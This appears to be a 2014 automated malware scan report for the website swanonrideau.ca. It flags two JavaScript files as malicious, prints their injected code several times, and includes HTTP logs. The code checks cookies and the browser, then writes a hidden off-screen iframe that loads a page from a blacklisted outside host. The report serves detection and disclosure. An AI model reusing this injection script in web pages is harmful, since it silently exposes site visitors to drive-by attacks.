Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=swanonrideau.ca
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://swanonrideau.ca/ | 200 OK Content-Length: 30339 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js | 200 OK Content-Length: 93637 Content-Type: text/javascript | clean |
http://swanonrideau.ca/index_files/stacks_page_page0.js | 200 OK Content-Length: 120674 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: igrasulter.mslcomputers.com.au function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[3365 bytes skipped]... Decoded script: <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://igrasulter.mslcomputers.com.au/filkakurtik16.html This URL is marked by Google as suspicious <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12497 Content-Type: application/javascript | clean |
http://platform.linkedin.com/in.js | 200 OK Content-Length: 3690 Content-Type: text/javascript | clean |
http://static.evernote.com/noteit.js | 200 OK Content-Length: 63754 Content-Type: application/javascript | clean |
http://code.jquery.com/jquery-2.0.0.min.js | 200 OK Content-Length: 83095 Content-Type: application/x-javascript | clean |
http://www.swanonrideau.ca/rw_common/themes/massv/javascript.js | 200 OK Content-Length: 16459 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[3347 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 205x205 src: http://igrasulter.mslcomputers.com.au/filkakurtik16.html This URL is marked by Google as suspicious <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://swanonrideau.ca/./ | 200 OK Content-Length: 30339 Content-Type: text/html | clean |
http://swanonrideau.ca/./index_files/stacks_page_page0.js | 200 OK Content-Length: 120674 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: igrasulter.mslcomputers.com.au function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[3365 bytes skipped]... Decoded script: <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://igrasulter.mslcomputers.com.au/filkakurtik16.html This URL is marked by Google as suspicious <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://swanonrideau.ca/././ | 200 OK Content-Length: 30339 Content-Type: text/html | clean |
http://swanonrideau.ca/././index_files/stacks_page_page0.js | 200 OK Content-Length: 120674 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: igrasulter.mslcomputers.com.au function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[3365 bytes skipped]... Decoded script: <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://igrasulter.mslcomputers.com.au/filkakurtik16.html This URL is marked by Google as suspicious <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://swanonrideau.ca/./././ | 200 OK Content-Length: 30339 Content-Type: text/html | clean |
http://swanonrideau.ca/./././index_files/stacks_page_page0.js | 200 OK Content-Length: 120674 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: igrasulter.mslcomputers.com.au function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[3365 bytes skipped]... Decoded script: <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://igrasulter.mslcomputers.com.au/filkakurtik16.html This URL is marked by Google as suspicious <iframe src="http://igrasulter.mslcomputers.com.au/filkakurtik16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://swanonrideau.ca/././././ | 200 OK Content-Length: 30339 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: swanonrideau.ca
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Sep 2014 17:03:26 GMT
Pragma: no-cache
Accept-Ranges: none
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 30339
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=40a1ff238f338255f06455fa79871875; path=/
X-Powered-By: PHP/5.4.32
...30339 bytes of data.
GET / HTTP/1.1
Host: swanonrideau.ca
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Sep 2014 17:03:26 GMT
Pragma: no-cache
Accept-Ranges: none
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 30339
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=40a1ff238f338255f06455fa79871875; path=/
X-Powered-By: PHP/5.4.32
...30339 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: swanonrideau.ca
Referer: http://www.google.com/search?q=swanonrideau.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: swanonrideau.ca
Referer: http://www.google.com/search?q=swanonrideau.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.